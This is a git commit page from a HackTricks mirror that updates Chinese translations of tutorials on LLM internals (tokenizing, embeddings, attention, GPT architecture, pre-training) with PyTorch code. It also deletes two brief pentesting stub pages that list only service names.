maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/AI/AI-llm-architecture/0.-basic-llm-concepts.md', 'src/

Browse Source
This commit is contained in:
Translator 2025-07-08 13:02:37 +00:00
parent 5e3dcaa121
commit fe82084142
163 changed files with 832 additions and 12756 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
src/1911-pentesting-fox.md
View File

@ -1,29 +0,0 @@
# 1911 - Pentesting fox
{{#include ./banners/hacktricks-training.md}}
还有更多服务:
ubiquiti-discover udp "Ubiquiti Networks Device"
dht udp "DHT Nodes"
5060 udp sip "SIP/"
![](<images/image (273).png>)
![](<images/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
InfluxDB
![](<images/image (337).png>)
![](<images/image (338).png>)
![](<images/image (339).png>)
![](<images/image (340).png>)
![](<images/image (341).png>)
{{#include ./banners/hacktricks-training.md}}

3
src/6881-udp-pentesting-bittorrent.md
View File

@ -1,3 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
{{#include ./banners/hacktricks-training.md}}

16
src/AI/AI-llm-architecture/0.-basic-llm-concepts.md
View File

@ -1,5 +1,7 @@
# 0. 基本 LLM 概念
{{#include /banners/hacktricks-training.md}}
## 预训练
预训练是开发大型语言模型LLM的基础阶段在此阶段模型接触到大量多样的文本数据。在此阶段**LLM 学习语言的基本结构、模式和细微差别**,包括语法、词汇、句法和上下文关系。通过处理这些广泛的数据,模型获得了对语言和一般世界知识的广泛理解。这一全面的基础使 LLM 能够生成连贯且上下文相关的文本。随后,这个预训练的模型可以进行微调,进一步在专业数据集上进行训练,以适应其在特定任务或领域的能力,从而提高其在目标应用中的性能和相关性。
@ -14,7 +16,7 @@
- **隐藏维度**:神经网络中隐藏层的大小。
- **层数(深度)**模型的层数。LLM 通常使用数十层。
- **注意力头数**在变换器模型中这是每层中使用的独立注意力机制的数量。LLM 通常使用数十个头。
- **丢弃率**:丢弃率类似于在训练过程中移除的数据百分比(概率变为 0用于**防止过拟合**。LLM 通常使用 0-20% 之间的丢弃率
- **丢弃率**:丢弃率类似于在训练过程中移除的数据百分比(概率变为 0用于**防止过拟合**。LLM 通常使用 0-20% 之间的
GPT-2 模型的配置:
```json
@ -41,13 +43,13 @@ GPT_CONFIG_124M = {
### Tensors as Data Containers
从计算的角度来看,张量充当多维数据的容器,每个维度可以表示数据的不同特征或方面。这使得张量非常适合处理机器学习任务中的复杂数据集。
从计算的角度来看,张量充当多维数据的容器,其中每个维度可以表示数据的不同特征或方面。这使得张量非常适合处理机器学习任务中的复杂数据集。
### PyTorch Tensors vs. NumPy Arrays
虽然 PyTorch 张量在存储和操作数值数据的能力上与 NumPy 数组相似,但它们提供了深度学习所需的额外功能:
- **Automatic Differentiation**: PyTorch 张量支持自动计算梯度autograd简化了计算训练神经网络所需的导数的过程。
- **Automatic Differentiation**: PyTorch 张量支持自动计算梯度autograd简化了训练神经网络所需的导数计算过程。
- **GPU Acceleration**: PyTorch 中的张量可以移动到 GPU 上进行计算,显著加快大规模计算的速度。
### Creating Tensors in PyTorch
@ -190,7 +192,7 @@ loss.backward()
print("Gradient w.r.t w:", w.grad)
print("Gradient w.r.t b:", b.grad)
```
请提供需要翻译的内容。
请提供需要翻译的具体内容。
```css
cssCopy codeGradient w.r.t w: tensor([-0.0898])
Gradient w.r.t b: tensor([-0.0817])
@ -199,11 +201,11 @@ Gradient w.r.t b: tensor([-0.0817])
### **1. 扩展到多层网络**
在具有多个层的大神经网络中,由于参数和操作数量的增加,计算梯度的过程变得更加复杂。然而,基本原理保持不变:
在具有多个层的大神经网络中,由于参数和操作数量的增加,计算梯度的过程变得更加复杂。然而,基本原理保持不变:
- **前向传播:** 通过每一层传递输入来计算网络的输出。
- **计算损失:** 使用网络的输出和目标标签评估损失函数。
- **反向传播Backpropagation** 通过从输出层递归应用链式法则,计算损失相对于网络中每个参数的梯度,直到输入层
- **反向传播Backpropagation** 通过从输出层递归应用链式法则到输入层,计算损失相对于网络中每个参数的梯度。
### **2. 反向传播算法**
@ -283,3 +285,5 @@ print(f"Gradient of {name}: {param.grad}")
- **效率:** 通过重用中间结果避免冗余计算。
- **准确性:** 提供精确的导数,达到机器精度。
- **易用性:** 消除了手动计算导数的需要。
{{#include /banners/hacktricks-training.md}}

43
src/AI/AI-llm-architecture/1.-tokenizing.md
View File

@ -1,71 +1,73 @@
# 1. Tokenizing
{{#include /banners/hacktricks-training.md}}
## Tokenizing
**Tokenizing** 是将数据(如文本)分解为更小、可管理的部分,称为 _tokens_ 的过程。每个 token 都会被分配一个唯一的数字标识符ID。这是为机器学习模型处理文本做准备的基本步骤尤其是在自然语言处理NLP中。
**Tokenizing** 是将数据(如文本)分解为称为 _tokens_ 的更小、更易管理的部分的过程。每个 token 然后被分配一个唯一的数字标识符 (ID)。这是为机器学习模型处理文本做准备的基本步骤,特别是在自然语言处理 (NLP) 中。
> [!TIP]
> 这个初始阶段的目标非常简单:**以某种合理的方式将输入划分为 tokensids**。
> 这个初始阶段的目标非常简单:**以某种有意义的方式将输入划分为 tokens (ids)**。
### **How Tokenizing Works**
1. **Splitting the Text:**
- **Basic Tokenizer:** 一个简单的 tokenizer 可能会将文本分割成单个单词和标点符号,去除空格。
- **Basic Tokenizer:** 一个简单的 tokenizer 可能将文本分割为单个单词和标点符号,去除空格。
- _Example:_\
文本: `"Hello, world!"`\
Tokens: `["Hello", ",", "world", "!"]`
2. **Creating a Vocabulary:**
- 为了将 tokens 转换为数字 ID创建一个 **vocabulary**。这个词汇表列出了所有唯一的 tokens单词和符号并为每个分配一个特定的 ID。
- **Special Tokens:** 这些是添加到词汇表中的特殊符号,以处理各种场景
- `[BOS]`(序列开始):表示文本的开始。
- `[EOS]`(序列结束):表示文本的结束。
- `[PAD]`(填充):用于使批次中的所有序列具有相同的长度。
- `[UNK]`(未知):表示不在词汇表中的 tokens。
- 为了将 tokens 转换为数字 ID创建一个 **vocabulary**。这个 vocabulary 列出了所有唯一的 tokens单词和符号并为每个 token 分配一个特定的 ID。
- **Special Tokens:** 这些是添加到 vocabulary 中以处理各种场景的特殊符号
- `[BOS]` (Beginning of Sequence): 表示文本的开始。
- `[EOS]` (End of Sequence): 表示文本的结束。
- `[PAD]` (Padding): 用于使批次中的所有序列具有相同的长度。
- `[UNK]` (Unknown): 表示不在 vocabulary 中的 tokens。
- _Example:_\
如果 `"Hello"` 被分配 ID `64``","``455``"world"``78``"!"``467`,那么:\
`"Hello, world!"``[64, 455, 78, 467]`
- **Handling Unknown Words:**\
如果像 `"Bye"` 这样的单词不在词汇表中,它会被替换为 `[UNK]`。\
如果像 `"Bye"` 这样的单词不在 vocabulary 中,它将被替换为 `[UNK]`。\
`"Bye, world!"``["[UNK]", ",", "world", "!"]``[987, 455, 78, 467]`\
_(假设 `[UNK]` 的 ID 是 `987`)_
### **Advanced Tokenizing Methods**
虽然基本的 tokenizer 对简单文本效果很好,但在处理大词汇表和新或稀有单词时存在局限性。高级 tokenizing 方法通过将文本分解为更小的子单元或优化 tokenization 过程来解决这些问题。
虽然基本的 tokenizer 对于简单文本效果很好,但在处理大型 vocabulary 和新词或稀有词时存在局限性。高级 tokenizing 方法通过将文本分解为更小的子单元或优化 tokenization 过程来解决这些问题。
1. **Byte Pair Encoding (BPE):**
- **Purpose:** 通过将稀有或未知单词分解为频繁出现的字节对,减少词汇表的大小并处理稀有或未知单词。
- **Purpose:** 通过将稀有或未知单词分解为频繁出现的字节对,减少 vocabulary 的大小并处理稀有或未知单词。
- **How It Works:**
- 从单个字符作为 tokens 开始。
- 迭代地将最频繁的 token 对合并为一个单一的 token。
- 继续直到没有更多频繁的对可以合并。
- **Benefits:**
- 消除了对 `[UNK]` token 的需求,因为所有单词都可以通过组合现有的子词 tokens 来表示。
- 更高效和灵活的词汇表
- 更高效和灵活的 vocabulary
- _Example:_\
`"playing"` 可能被 tokenized 为 `["play", "ing"]`,如果 `"play"``"ing"` 是频繁的子词。
2. **WordPiece:**
- **Used By:** 像 BERT 这样的模型。
- **Purpose:** 类似于 BPE它将单词分解为子词单元以处理未知单词并减少词汇表大小。
- **Purpose:** 类似于 BPE它将单词分解为子词单元以处理未知单词并减少 vocabulary 大小。
- **How It Works:**
- 从单个字符的基本词汇表开始。
- 从单个字符的基础 vocabulary 开始。
- 迭代地添加最频繁的子词,以最大化训练数据的可能性。
- 使用概率模型决定合并哪些子词。
- **Benefits:**
- 在拥有可管理的词汇表大小和有效表示单词之间取得平衡。
- 在拥有可管理的 vocabulary 大小和有效表示单词之间取得平衡。
- 高效处理稀有和复合单词。
- _Example:_\
`"unhappiness"` 可能被 tokenized 为 `["un", "happiness"]``["un", "happy", "ness"]`,具体取决于词汇表
`"unhappiness"` 可能被 tokenized 为 `["un", "happiness"]``["un", "happy", "ness"]`,具体取决于 vocabulary
3. **Unigram Language Model:**
- **Used By:** 像 SentencePiece 这样的模型。
- **Purpose:** 使用概率模型确定最可能的子词 tokens 集合。
- **How It Works:**
- 从一组潜在的 tokens 开始。
- 迭代地移除那些对模型的训练数据概率改善最小的 tokens。
- 最终确定一个词汇表,其中每个单词由最可能的子词单元表示。
- 最终确定一个 vocabulary,其中每个单词由最可能的子词单元表示。
- **Benefits:**
- 灵活且可以更自然地建模语言。
- 通常导致更高效和紧凑的 tokenizations。
- 通常导致更高效和紧凑的 tokenizations。
- _Example:_\
`"internationalization"` 可能被 tokenized 为更小的、有意义的子词,如 `["international", "ization"]`
@ -93,3 +95,6 @@ print(token_ids[:50])
## 参考
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

15
src/AI/AI-llm-architecture/2.-data-sampling.md
View File

@ -1,20 +1,22 @@
# 2. 数据采样
{{#include /banners/hacktricks-training.md}}
## **数据采样**
**数据采样** 是为训练大型语言模型LLMs GPT 准备数据的关键过程。它涉及将文本数据组织成模型用于学习如何根据前面的单词预测下一个单词(或标记)的输入和目标序列。适当的数据采样确保模型有效捕捉语言模式和依赖关系。
**数据采样**是为训练大型语言模型LLMs如GPT准备数据的关键过程。它涉及将文本数据组织成输入和目标序列,模型利用这些序列学习如何根据前面的单词预测下一个单词(或标记)。适当的数据采样确保模型有效捕捉语言模式和依赖关系。
> [!TIP]
> 第二阶段的目标非常简单:**对输入数据进行采样,并为训练阶段准备,通常通过将数据集分成特定长度的句子并生成预期的响应。**
> 这个第二阶段的目标非常简单:**对输入数据进行采样,并为训练阶段准备,通常通过将数据集分成特定长度的句子并生成预期的响应。**
### **为什么数据采样很重要**
GPT 这样的 LLM 通过理解前面单词提供的上下文来生成或预测文本。为了实现这一点,训练数据必须以模型能够学习单词序列及其后续单词之间关系的方式进行结构化。这种结构化的方法使模型能够概括并生成连贯且上下文相关的文本。
GPT这样的LLMs通过理解前面单词提供的上下文来生成或预测文本。为了实现这一点,训练数据必须以模型能够学习单词序列及其后续单词之间关系的方式进行结构化。这种结构化的方法使模型能够概括并生成连贯且上下文相关的文本。
### **数据采样中的关键概念**
1. **标记化:** 将文本分解为称为标记的较小单元(例如,单词、子词或字符)。
2. **序列长度 (max_length)** 每个输入序列中的标记数量。
2. **序列长度max_length** 每个输入序列中的标记数量。
3. **滑动窗口:** 通过在标记化文本上移动窗口来创建重叠输入序列的方法。
4. **步幅:** 滑动窗口向前移动以创建下一个序列的标记数量。
@ -228,6 +230,9 @@ tensor([[ 367, 2885, 1464, 1807],
[ 3285, 326, 11, 287]])
]
```
## 参考文献
## 参考
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

15
src/AI/AI-llm-architecture/3.-token-embeddings.md
View File

@ -1,14 +1,16 @@
# 3. Token Embeddings
{{#include /banners/hacktricks-training.md}}
## Token Embeddings
在对文本数据进行分词后,为像 GPT 这样的训练大型语言模型 (LLMs) 准备数据的下一个关键步骤是创建 **token embeddings**。Token embeddings 将离散的标记(如单词或子词)转换为模型可以处理和学习的连续数值向量。此解释分解了 token embeddings、它们的初始化、使用以及位置嵌入在增强模型对标记序列理解中的作用。
在对文本数据进行标记化后,为像 GPT 这样的训练大型语言模型 (LLMs) 准备数据的下一个关键步骤是创建 **token embeddings**。Token embeddings 将离散的标记(如单词或子词)转换为模型可以处理和学习的连续数值向量。此解释分解了 token embeddings、它们的初始化、使用以及位置嵌入在增强模型对标记序列理解中的作用。
> [!TIP]
> 这个第三阶段的目标非常简单:**为词汇表中的每个先前标记分配一个所需维度的向量以训练模型。** 词汇表中的每个单词将在 X 维空间中有一个点。\
> 请注意,最初每个单词在空间中的位置是“随机”初始化的,这些位置是可训练的参数(将在训练过程中得到改善)。
> 请注意,最初每个单词在空间中的位置是“随机”初始化的,这些位置是可训练的参数(将在训练过程中得到改善)。
>
> 此外,在 token embedding 期间 **创建了另一层嵌入**,它表示(在这种情况下)**单词在训练句子中的绝对位置**。这样,句子中不同位置的单词将具有不同的表示(含义)。
> 此外,在 token embedding 过程中 **创建了另一层嵌入**,它表示(在这种情况下)**单词在训练句子中的绝对位置**。这样,句子中不同位置的单词将具有不同的表示(含义)。
### **What Are Token Embeddings?**
@ -128,7 +130,7 @@ cssCopy codeBatch
### **为什么需要位置嵌入:**
- **令牌顺序很重要:** 在句子中,意义往往依赖于单词的顺序。例如,“猫坐在垫子上”与“垫子坐在猫上”。
- **嵌入限制:** 没有位置信息,模型将令牌视为“词袋”,忽略它们的顺序。
- **嵌入限制:** 如果没有位置信息,模型将令牌视为“词袋”,忽略它们的顺序。
### **位置嵌入的类型:**
@ -198,6 +200,9 @@ pos_embeddings = pos_embedding_layer(torch.arange(max_length))
input_embeddings = token_embeddings + pos_embeddings
print(input_embeddings.shape) # torch.Size([8, 4, 256])
```
## 参考文献
## 参考
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

31
src/AI/AI-llm-architecture/4.-attention-mechanisms.md
View File

@ -1,12 +1,14 @@
# 4. 注意机制
## 注意机制和神经网络中的自注意力
{{#include /banners/hacktricks-training.md}}
## 神经网络中的注意机制和自注意力
注意机制允许神经网络在生成输出的每个部分时**专注于输入的特定部分**。它们为不同的输入分配不同的权重,帮助模型决定哪些输入与当前任务最相关。这在机器翻译等任务中至关重要,因为理解整个句子的上下文对于准确翻译是必要的。
> [!TIP]
> 这一阶段的目标非常简单:**应用一些注意机制**。这些将是许多**重复的层**,将**捕捉词汇中一个词与当前用于训练LLM的句子中其邻居的关系**。\
> 为此使用了很多层,因此有很多可训练的参数来捕捉这些信息。
> 为此使用了很多层,因此有很多可训练的参数来捕捉这些信息。
### 理解注意机制
@ -14,7 +16,7 @@
#### 示例:机器翻译
考虑将德语句子 "Kannst du mir helfen diesen Satz zu übersetzen" 翻译成英语。逐字翻译不会产生语法正确的英语句子,因为不同语言之间的语法结构存在差异。注意机制使模型在生成输出句子的每个单词时能够专注于输入句子的相关部分,从而导致更准确和连贯的翻译。
考虑将德语句子 "Kannst du mir helfen diesen Satz zu übersetzen" 翻译成英语。逐字翻译不会产生语法正确的英语句子,因为不同语言之间的语法结构存在差异。注意机制使模型在生成输出句子的每个单词时能够专注于输入句子的相关部分,从而实现更准确和连贯的翻译。
### 自注意力介绍
@ -39,7 +41,7 @@
#### 步骤1计算注意分数
> [!TIP]
> 只需将查询的每个维度值与每个标记的相关维度相乘并加上结果。你将为每对标记获得1个值。
> 只需将查询的每个维度值与每个标记的相关维度相乘并加上结果。你会得到每对标记的1个值。
对于句子中的每个单词,通过计算它们嵌入的点积来计算与 "shiny" 的**注意分数**。
@ -68,7 +70,7 @@
计算指数:
<figure><img src="../../images/image (4) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
<figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
计算总和:
@ -157,7 +159,7 @@ values = torch.matmul(inputs, W_value)
**计算注意力分数**
与之前的例类似,但这次我们使用的是令牌的键矩阵(已经使用维度计算得出),而不是令牌维度的值。因此,对于每个查询 `qi` 和键 `kj`
与之前的例类似,但这次我们使用的是令牌的键矩阵(已经使用维度计算得出),而不是令牌维度的值。因此,对于每个查询 `qi` 和键 `kj`
<figure><img src="../../images/image (12).png" alt=""><figcaption></figcaption></figure>
@ -170,19 +172,19 @@ values = torch.matmul(inputs, W_value)
> [!TIP]
> 分数除以维度的平方根是因为点积可能变得非常大,这有助于调节它们。
**应用Softmax以获得注意力权重** 与最初的例一样规范化所有值使它们的总和为1。
**应用Softmax以获得注意力权重** 与最初的例一样规范化所有值使它们的总和为1。
<figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>
#### 第3步计算上下文向量
与最初的例一样,只需将所有值矩阵相加,每个值乘以其注意力权重:
与最初的例一样,只需将所有值矩阵相加,每个值乘以其注意力权重:
<figure><img src="../../images/image (15).png" alt="" width="328"><figcaption></figcaption></figure>
### 代码示例
从 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) 获取一个示例,您可以查看这个实现我们讨论的自注意力功能的类:
从 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) 获取一个示例,您可以查看这个实现我们讨论的自注意力功能的类:
```python
import torch
@ -222,15 +224,15 @@ sa_v2 = SelfAttention_v2(d_in, d_out)
print(sa_v2(inputs))
```
> [!TIP]
> 注意,`nn.Linear` 被用来将所有权重标记为可训练参数,而不是用随机值初始化矩阵。
> 注意,`nn.Linear` 用于将所有权重标记为可训练参数,而不是用随机值初始化矩阵。
## 因果注意力:隐藏未来词汇
对于 LLM我们希望模型考虑当前位置信息之前出现的标记,以便**预测下一个标记**。**因果注意力**,也称为**掩蔽注意力**,通过修改注意力机制来防止访问未来标记,从而实现这一点。
对于 LLM我们希望模型考虑当前位置信息之前出现的标记,以便 **预测下一个标记**。**因果注意力**,也称为 **掩蔽注意力**,通过修改注意力机制来防止访问未来标记,从而实现这一点。
### 应用因果注意力掩码
为了实现因果注意力,我们在**softmax 操作之前**对注意力分数应用掩码,以便剩余的分数仍然相加为 1。该掩码将未来标记的注意力分数设置为负无穷确保在 softmax 之后,它们的注意力权重为零。
为了实现因果注意力,我们在 **softmax 操作之前** 对注意力分数应用掩码,以便剩余的分数仍然相加为 1。该掩码将未来标记的注意力分数设置为负无穷确保在 softmax 之后,它们的注意力权重为零。
**步骤**
@ -250,7 +252,7 @@ attention_weights = torch.softmax(masked_scores, dim=-1)
### 使用 Dropout 掩蔽额外的注意力权重
为了**防止过拟合**,我们可以在 softmax 操作后对注意力权重应用**dropout**。Dropout **在训练期间随机将一些注意力权重置为零**
为了 **防止过拟合**,我们可以在 softmax 操作后对注意力权重应用 **dropout**。Dropout **在训练期间随机将一些注意力权重置为零**
```python
dropout = nn.Dropout(p=0.5)
attention_weights = dropout(attention_weights)
@ -414,3 +416,6 @@ print("context_vecs.shape:", context_vecs.shape)
## References
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

29
src/AI/AI-llm-architecture/5.-llm-architecture.md
View File

@ -1,9 +1,11 @@
# 5. LLM Architecture
{{#include /banners/hacktricks-training.md}}
## LLM Architecture
> [!TIP]
> 第五阶段的目标非常简单:**开发完整LLM的架构**。将所有内容整合在一起应用所有层并创建所有功能以生成文本或将文本转换为ID并反向转换
> 第五阶段的目标非常简单:**开发完整LLM的架构**。将所有内容整合在一起应用所有层并创建所有功能以生成文本或将文本转换为ID及其反向操作
>
> 该架构将用于训练和预测文本,训练后进行预测。
@ -210,8 +212,8 @@ torch.sqrt(torch.tensor(2.0 / torch.pi)) *
```
#### **目的和功能**
- **GELU (高斯误差线性单元):** 一种激活函数,模型引入非线性。
- **平滑激活:** 与ReLU不同ReLU将负输入归零GELU平滑地将输入映射到输出允许负输入有小的非零值。
- **GELU (高斯误差线性单元):** 一种激活函数,模型引入非线性。
- **平滑激活:** 与ReLU不同ReLU将负输入归零GELU平滑地将输入映射到输出允许负输入有小的非零值。
- **数学定义:**
<figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
@ -293,7 +295,7 @@ return self.scale * norm_x + self.shift
- **层归一化:** 一种用于对每个批次中单个示例的特征(嵌入维度)进行归一化的技术。
- **组件:**
- **`eps`** 一个小常数(`1e-5`在归一化过程中添加到方差中以防止除以零。
- **`eps`** 一个小常数(`1e-5`),添加到方差中以防止在归一化过程中出现除以零的情况
- **`scale``shift`** 可学习的参数(`nn.Parameter`允许模型对归一化输出进行缩放和偏移。它们分别初始化为1和0。
- **归一化过程:**
- **计算均值(`mean`** 计算输入 `x` 在嵌入维度(`dim=-1`)上的均值,同时保持维度以便广播(`keepdim=True`)。
@ -372,11 +374,11 @@ return x # Output shape: (batch_size, seq_len, emb_dim)
> transformer块将所有网络组合在一起并应用一些**归一化**和**丢弃法**以改善训练的稳定性和结果。\
> 注意丢弃法是在每个网络使用后进行的,而归一化是在之前应用的。
>
> 此外,它还使用快捷方式,即**将网络的输出与其输入相加**。这有助于通过确保初始层的贡献与最后一层“相当”来防止梯度消失问题
> 此外,它还使用快捷方式,即**将网络的输出与其输入相加**。这有助于防止梯度消失问题,确保初始层的贡献与最后一层“相当”。
### **GPTModel**
_形状作为注释添加以更好地理解矩阵的形状_
_已添加形状作为注释以更好地理解矩阵的形状_
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
class GPTModel(nn.Module):
@ -444,13 +446,13 @@ return logits # Output shape: (batch_size, seq_len, vocab_size)
> [!TIP]
> 该类的目标是使用所有其他提到的网络来**预测序列中的下一个令牌**,这对于文本生成等任务至关重要。
>
> 注意它将**使用尽可能多的变换器块**,并且每个变换器块使用一个多头注意力网络一个前馈网络和几个归一化。因此,如果使用12 个变换器块,则将其乘以 12。
> 注意它将**使用尽可能多的变换器块**,并且每个变换器块使用一个多头注意力网络一个前馈网络和几个归一化。因此如果使用12个变换器块则将其乘以12。
>
> 此外,在**输出**之前添加了一个**归一化**层,并在最后应用一个线性层以获得具有适当维度的结果。注意每个最终向量的大小与使用的词汇相同。这是因为它试图为词汇中的每个可能令牌获取一个概率。
> 此外,在**输出**之前添加了一个**归一化**层,并在最后应用一个最终线性层以获得具有适当维度的结果。注意每个最终向量的大小与使用的词汇相同。这是因为它试图为词汇中的每个可能令牌获取一个概率。
## 训练的参数数量
定义了 GPT 结构后,可以找出要训练的参数数量:
定义了GPT结构后可以找出要训练的参数数量
```python
GPT_CONFIG_124M = {
"vocab_size": 50257, # Vocabulary size
@ -585,8 +587,8 @@ pythonCopy codefinal_layer_norm_params = 2 * 768 = 1,536
```
**b. 输出投影层 (`out_head`)**
- **层** `nn.Linear(emb_dim, vocab_size, bias=False)`
- **参数** `emb_dim * vocab_size`
- **层:** `nn.Linear(emb_dim, vocab_size, bias=False)`
- **参数:** `emb_dim * vocab_size`
```python
pythonCopy codeoutput_projection_params = 768 * 50257 = 38,597,376
```
@ -610,7 +612,7 @@ total_params = 163,009,536
拥有一个像之前那样预测下一个标记的模型,只需从输出中获取最后一个标记的值(因为它们将是预测标记的值),这将是**词汇表中每个条目的值**,然后使用`softmax`函数将维度归一化为总和为1的概率然后获取最大条目的索引这将是词汇表中单词的索引。
来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
代码来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
```python
def generate_text_simple(model, idx, max_new_tokens, context_size):
# idx is (batch, n_tokens) array of indices in the current context
@ -664,3 +666,6 @@ print("Output length:", len(out[0]))
## 参考
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

31
src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md
View File

@ -1,5 +1,7 @@
# 6. 预训练与加载模型
{{#include /banners/hacktricks-training.md}}
## 文本生成
为了训练一个模型,我们需要该模型能够生成新的标记。然后,我们将生成的标记与预期的标记进行比较,以便训练模型**学习它需要生成的标记**。
@ -11,12 +13,12 @@
## 文本评估
为了进行正确的训练,需要测量检查获得的预测与预期标记的匹配情况。训练的目标是最大化正确标记的可能性,这涉及到相对于其他标记增加其概率。
为了进行正确的训练,需要测量检查获得的预测与预期标记的匹配程度。训练的目标是最大化正确标记的可能性,这涉及到相对于其他标记增加其概率。
为了最大化正确标记的概率,必须修改模型的权重,以使该概率最大化。权重的更新是通过**反向传播**完成的。这需要一个**要最大化的损失函数**。在这种情况下,函数将是**执行的预测与期望预测之间的差异**。
然而,它将使用以n为底的对数不是处理原始预测。因此如果当前对预期标记的预测是7.4541e-05则**7.4541e-05**的自然对数(以*e*为底)大约是**-9.5042**。\
然后,对于每个具有5个标记上下文长度的条目例如模型需要预测5个标记前4个标记是输入的最后一个第五个是预测的标记。因此在这种情况下对于每个条目我们将有5个预测即使前4个在输入中模型并不知道这一点因此有5个预期标记因此有5个概率需要最大化。
然而,它将不是处理原始预测而是处理以n为底的对数。因此如果当前对预期标记的预测是7.4541e-05则**7.4541e-05**的自然对数(以*e*为底)大约是**-9.5042**。\
然后,对于每个上下文长度为5个标记的条目例如模型需要预测5个标记前4个标记是输入的最后一个第五个是预测的标记。因此在这种情况下对于每个条目我们将有5个预测即使前4个在输入中模型并不知道这一点因此有5个预期标记因此有5个概率需要最大化。
因此,在对每个预测执行自然对数后,计算**平均值**,去掉**负号**这称为_交叉熵损失_这是**需要尽可能接近0的数字**因为1的自然对数是0
@ -545,12 +547,12 @@ return tokenizer.decode(flat.tolist())
在前面的部分中,一个函数仅在获取 logits 后获取 **最可能的标记**。然而,这意味着对于每个输入,总是会生成相同的输出,这使得它非常确定性。
以下 `generate_text` 函数将应用 `top-k``temperature``multinomial` 概念。
以下 `generate_text` 函数将应用 `top-k``temperature``multinomial` 概念。
- **`top-k`** 意味着我们将开始将所有标记的概率减少到 `-inf`,除了前 k 个标记。因此,如果 k=3在做出决之前,只有 3 个最可能的标记的概率将与 `-inf` 不同。
- **`top-k`** 意味着我们将开始将所有标记的概率减少到 `-inf`,除了前 k 个标记。因此,如果 k=3在做出决之前,只有 3 个最可能的标记的概率将与 `-inf` 不同。
- **`temperature`** 意味着每个概率将被温度值除以。值为 `0.1` 将提高最高概率与最低概率的比较,而温度为 `5` 的情况下,例如将使其更加平坦。这有助于提高我们希望 LLM 具有的响应变化。
- 在应用温度后,再次应用 **`softmax`** 函数,使所有剩余标记的总概率为 1。
- 最后,函数不再选择概率最大的标记,而是应用 **`multinomial`** 来 **根据最终概率预测下一个标记**。因此,如果标记 1 的概率为 70%,标记 2 的概率为 20%,标记 3 的概率为 10%,那么 70% 的时间将选择标记 120% 的时间将选择标记 210% 的时间将选择标记 3。
- 最后,函数 **`multinomial`** 被应用于 **根据最终概率预测下一个标记**,而不是选择具有最大概率的标记。因此,如果标记 1 的概率为 70%,标记 2 的概率为 20%,标记 3 的概率为 10%,那么 70% 的时间将选择标记 120% 的时间将选择标记 210% 的时间将选择标记 3。
```python
# Generate text function
def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None):
@ -594,7 +596,7 @@ return idx
> [!TIP]
> 有一种常见的替代方法叫做 [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling),也称为核采样,它不是获取具有最高概率的 k 个样本,而是 **按概率对所有结果的 **词汇** 进行排序,并从最高概率到最低概率 **累加**,直到达到 **阈值**
>
> 然后,**只有些词** 的词汇将根据它们的相对概率被考虑。
> 然后,**只有些词** 的词汇将根据它们的相对概率被考虑。
>
> 这使得不需要选择一个数量为 `k` 的样本,因为最佳的 k 可能在每种情况下都不同,而是 **只需要一个阈值**
>
@ -756,12 +758,12 @@ print("Validation loss:", val_loss)
然后,主要的函数 `train_model_simple` 实际上是训练模型的函数。它期望:
- 训练数据加载器(数据已分离并准备好进行训练)
- 训练数据加载器(数据已分离并准备好进行训练)
- 验证器加载器
- 训练期间使用的 **优化器**:这是将使用梯度并更新参数以减少损失的函数。在这种情况下,如你所见,使用的是 `AdamW`,但还有许多其他选择。
- 训练期间使用的 **优化器**:这是将使用梯度并更新参数以减少损失的函数。在这种情况下,正如你将看到的,使用的是 `AdamW`,但还有许多其他选择。
- 调用 `optimizer.zero_grad()` 以在每轮重置梯度,防止它们累积。
- **`lr`** 参数是 **学习率**,决定在优化过程中更新模型参数时采取的 **步长大小**。较 **小** 的学习率意味着优化器对权重进行 **较小的更新**,这可能导致更 **精确** 的收敛,但可能会 **减慢** 训练。较 **大** 的学习率可以加快训练,但 **有可能超出** 损失函数的最小值(**跳过** 损失函数最小化的点)。
